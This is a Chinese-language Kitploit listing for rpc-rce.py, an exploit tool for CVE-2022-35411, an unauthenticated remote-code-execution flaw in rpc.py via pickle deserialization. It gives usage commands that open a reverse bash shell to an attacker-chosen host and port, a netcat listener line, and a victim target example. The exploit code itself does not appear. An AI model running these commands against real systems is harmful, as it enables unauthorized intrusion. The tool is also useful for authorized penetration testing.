Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
rpc-rce.py — CVE-2022-35411 的利用工具 — rpc.py (<= 0.6.0) 中的未认证远程代码执行漏洞 | Kitploit
工具/GitHubGitHub/cspanias/rpc-rce.py
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubcspanias/rpc-rce.py

rpc-rce.py

CVE-2022-35411 的利用工具 — rpc.py (<= 0.6.0) 中的未认证远程代码执行漏洞

查看仓库
21年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

rpc.py RCE 利用工具(CVE-2022-35411)

这是一个更新和改进的利用程序,针对 CVE-2022-35411,目标版本为 rpc.py 中易受攻击的版本(<= 0.6.0)。
它允许通过 Python pickle 反序列化实现 未认证远程代码执行(RCE)。

原始利用作者:Elias Hohl
增强者:x7331 针对可用性、可移植性和自动化进行了改进


漏洞概要

漏洞存在于 rpc.py 中对 Python pickle 模块的不安全使用,允许精心构造的有效载荷 无需认证 即可执行任意命令。

  • CVE ID:CVE-2022-35411
  • 受影响版本:rpc.py v0.4.2 – v0.6.0
  • 利用类型:未认证远程代码执行(RCE)

变更内容

  • ✅ 切换到 argparse,支持 --lhost、--lport、--target 和 --dry-run 参数
  • ✅ 清晰、模块化的代码结构
  • ✅ 可选的反向 shell 传输(TCP Bash)
  • ✅ Curl 测试 payload(安全模式)
  • ✅ 日志支持及更清晰的输出
  • ✅ 通过 -h / --help 提供正确的使用指导
  • ✅ 添加元数据和内联注释以增强可读性

使用方法

反向 Shell 示例

root@kitploit:~
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001

干运行(无 shell,仅 curl 测试)

root@kitploit:~
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --dry-run

自定义目标(可选)

root@kitploit:~
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --target http://victim.internal:65432/sayhi

要求

  • Python 3.x
  • requests 库(使用 pip install requests 安装)
  • 在你的 LHOST 上启动监听器(例如 nc -lvnp 9001)
  • 运行易受攻击的 rpc.py 服务器

法律与道德声明

本利用工具仅用于教育和授权测试目的。 请勿将其用于你不拥有或未经明确许可进行测试的系统。

下载工具